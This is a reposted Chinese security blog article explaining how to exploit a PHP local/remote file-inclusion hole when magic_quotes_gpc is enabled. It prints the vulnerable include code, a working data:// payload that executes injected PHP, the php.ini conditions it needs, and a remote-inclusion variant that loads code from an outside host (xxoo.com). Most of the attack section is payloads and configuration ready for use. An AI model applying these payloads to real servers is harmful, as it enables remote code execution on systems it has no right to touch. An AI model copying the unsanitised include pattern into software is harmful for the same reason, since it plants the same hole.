开启GPC情况下本地包含

admin
admin
admin
139189
文章
114
评论
2024年4月4日13:51:24评论6 views字数 700阅读2分20秒阅读模式

文章于 2013-11-19 发表于t00ls
开启GPC情况下本地包含

漏洞代码:

1
2
 
$langx=$_REQUEST['langx'];
include ($langx.".inc.php");

环境:

1
2
3
4
5
6
7
 
magic_quotes_gpc        On
allow_url_fopen        On
allow_url_include        On

PHP Version 5.3.3-7
Apache 2.0
Linux debian 2.6.32-5-amd64

GPCon
%00 截断? 超长 ././
都不行

post 或get方式提交
langx=data://text/plain,<?php phpinfo();?>

相当于 包含了一个内容为 <?php phpinfo();?>.inc.php的文件

所以不用考虑截断
成功执行!

测试:

1
2
 
allow_url_fopen        Off  
allow_url_include        On

包含失败

1
2
 
allow_url_fopen        On    
allow_url_include        Off

包含失败

依赖条件:

1
2
3
 
allow_url_fopen        On
allow_url_include        On
PHP 5.2.0 以上

利用场景:php 版本过高(大于php5.3.4 NULL截断失效)或开启GPC 导致截取失效, 但恰好服务器 php.ini allow_url_fopen、allow_url_include 都配置为on
不过 很少有服务器同时 开启这两个

更多方式期待大家测试与交流

补充:

远程放一个 xx.inc.php
利用:http://target_site/include.php?xx=http://xxoo.com/xx
利用场景更宽

- source:wolvez.club

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月4日13:51:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   开启GPC情况下本地包含http://cn-sec.com/archives/2629176.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息